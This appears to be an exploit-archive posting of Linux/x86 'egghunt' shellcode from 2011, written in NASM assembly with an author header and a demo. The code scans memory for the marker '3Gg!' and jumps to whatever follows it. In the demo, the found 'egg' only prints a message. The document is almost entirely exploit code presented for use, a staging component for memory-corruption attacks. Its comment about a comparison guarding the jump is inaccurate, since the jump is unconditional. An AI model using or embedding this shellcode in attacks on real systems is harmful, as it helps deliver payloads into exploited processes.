/*
Exploit Title: Linux/x86 egghunt shellcode
Date: 21-07-2011
Author: Ali Raheem
Tested on:
Linux Ali-PC.home 2.6.38.8-35.fc15.x86_64 #1 SMP Wed Jul 6 13:58:54 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
Linux injustice 2.6.38-10-generic #46-Ubuntu SMP Tue Jun 28 15:05:41 UTC 2011 i686 i686 i386 GNU/Linux
http://codepad.org/tkSONxY5 Code pad lets you execute code live check here for a live demostration
Thanks: Stealth- for testing and codepad.com for being so useful.
[ali@Ali-PC asm]$ cat egghunter.s
section .data
 egg equ "3Gg!" ;this is the egg marker
section .text
 global _start
_start:
 mov eax, _start ;0x8048080 is a good safe starting point
_next:
 inc eax
_isEgg:
 cmp dword [eax-4],egg
 jne _next
 cmp eax,ebx
 jmp eax
*/
section .data
 msg db "We found the egg!",0ah,0dh
 msg_len equ $-msg
 egg equ "3Gg!"
section .text
 global _start
;This simple egg will print msg if we find it
_egg:
 db "3Gg!"                  ;Start your egg with this marker
 mov eax,4
 mov ebx,1
 mov ecx,msg
 mov edx,msg_len
 int 80h
 mov eax,1
 int 80h
_start:
 mov eax, 0x8048080
_next:
 inc eax
_isEgg:
 cmp dword [eax-4],egg ;is this our marker?
 jne _next                   ;No? skip
 cmp eax,ebx                 ;Make sure JNE is not true if we found our self
 jmp eax                     ;Execute the egg